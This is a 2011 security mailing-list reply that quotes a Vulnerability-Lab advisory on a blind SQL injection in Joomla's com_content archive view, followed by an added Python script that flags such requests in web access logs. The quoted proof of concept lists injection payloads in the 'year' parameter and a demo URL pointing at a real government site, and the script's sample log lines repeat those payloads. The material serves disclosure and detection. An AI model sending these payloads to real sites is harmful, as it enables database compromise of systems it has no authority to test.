Message-ID: <20111113190623.GB6611@foo.fgeek.fi>
Date: Sun, 13 Nov 2011 21:06:23 +0200
From: Henri Salo <henri@...v.fi>
To: full-disclosure@...ts.grok.org.uk
Cc: research@...nerability-lab.com
Subject: Re: Joomla Component (com_content) - Blind SQL Injection Vulnerability

On Sat, Nov 12, 2011 at 12:35:35AM +0100, research@...nerability-lab.com wrote:
> Title:
> ======
> Joomla Component (com_content) - Blind SQL Injection Vulnerability
>
>
> Date:
> =====
> 2011-11-11
>
>
> References:
> ===========
> http://www.vulnerability-lab.com/get_content.php?id=323
>
>
> VL-ID:
> =====
> 323
>
>
> Introduction:
> =============
> Joomla is a free and open source content management system (CMS) for publishing content on
> the World Wide Web and intranets and a model–view–controller (MVC) Web application framework
> that can also be used independently.
> Joomla is written in PHP, uses object-oriented programming (OOP) techniques and software design
> patterns[citation needed], stores data in a MySQL database, and includes features such as page
> caching, RSS feeds, printable versions of pages, news flashes, blogs, polls, search, and support
> for language internationalization.
> Joomla had been downloaded 23 million times. Between March 2007 and February 2011 there had been
> more than 21 million downloads. There are over 7,400 free and commercial extensions available
> from the official Joomla! Extension Directory and more available from other sources
>
> (Copy of the Vendor Website: http://en.wikipedia.org/wiki/Joomla!)
>
>
> Abstract:
> =========
> A vulnerability laboratory researcher discovered a Blind SQL Injection vulnerability on the com_content component of the joomla CMS.
>
>
> Status:
> ========
> Published
>
>
> Exploitation-Technique:
> =======================
> Remote
>
>
> Severity:
> =========
> Critical
>
>
> Details:
> ========
> A blind SQL Injection vulnerability was detected on the com_content component of the joomla CMS.
> The vulnerability allows an attacker (remote) to inject/execute own sql statements on the affected application dbms.
> Successful exploitation of the vulnerability can result in compromise of the affected application dbms.
>
> Vulnerable Module(s):
> [+] com_content
>
>
> Proof of Concept:
> =================
> The vulnerability can be exploited by remote attackers. For demonstration or reproduce ...
>
> 1: [Site]/joomla/index.php?option=com_content&view=archive&year=1 [BSQLI]
>
> 2: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=1--
>
> 3: [Site]/joomla/index.php?option=com_content&view=archive&year=-1 or 1=0--
>
>
> [x] Demo :
>
> http://www.paul.house.gov/index.php?option=com_content&view=archive&year=-1 or 1=0--
>
>
> Risk:
> =====
> The security risk of the blind sql injection vulnerability is estimated as critical.
>
>
> Credits:
> ========
> E.Shahmohamadi (IRAN)
>
>
> Disclaimer:
> ===========
> The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties,
> either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
> Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
> profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
> states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
> may not apply. Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability-
> Lab. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of
> other media, are reserved by Vulnerability-Lab or its suppliers.
>
> Copyright © 2011|Vulnerability-Lab
>
> --
> Website: www.vulnerability-lab.com ; vuln-lab.com or vuln-db.com
> Contact: admin@...nerability-lab.com or support@...nerability-lab.com

Did you report this to Joomla? Have you asked for a CVE ID?

Best regards,
Henri Salo

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
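
The requests in the quoted proof of concept all carry non-numeric text in the `year` parameter of the com_content archive view. As an added example (not part of the original message and not Joomla's code), the following check flags such requests in a web access log and groups them by client. It assumes Combined Log Format and that a valid archive year is 1 to 4 digits; the log lines are constructed.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Client address and request target from a Combined Log Format line.
LINE_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (.+?) HTTP/[\d.]+"')
YEAR_OK = re.compile(r"\d{1,4}")  # assumption: a valid archive year is 1-4 digits

def suspicious_year(target):
    """Return the decoded `year` value when a com_content archive request
    carries a year that is not purely numeric (empty included), else None."""
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    if params.get("option", [""])[-1] != "com_content":
        return None
    if params.get("view", [""])[-1] != "archive":
        return None
    for value in params.get("year", []):
        if not YEAR_OK.fullmatch(value):
            return value
    return None

def scan(lines):
    """Map client address -> list of non-numeric year values it sent."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            value = suspicious_year(m.group(2))
            if value is not None:
                hits[m.group(1)].append(value)
    return dict(hits)

# Constructed sample log lines (documentation addresses, not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [13/Nov/2011:19:00:01 +0200] "GET /joomla/index.php?option=com_content&view=archive&year=2011 HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Nov/2011:19:00:05 +0200] "GET /joomla/index.php?option=com_content&view=archive&year=-1%20or%201=1-- HTTP/1.1" 200 5120',
    '198.51.100.7 - - [13/Nov/2011:19:00:06 +0200] "GET /joomla/index.php?option=com_content&view=archive&year=-1%20or%201=0-- HTTP/1.1" 200 812',
    '192.0.2.10 - - [13/Nov/2011:19:00:09 +0200] "GET /joomla/index.php?option=com_content&view=article&id=5 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for client, values in scan(SAMPLE_LOG).items():
        print(client, values)
```

A client that sends two or more different non-numeric `year` values in quick succession, as 198.51.100.7 does in the sample, matches the true/false pairing shown in items 2 and 3 of the quoted proof of concept.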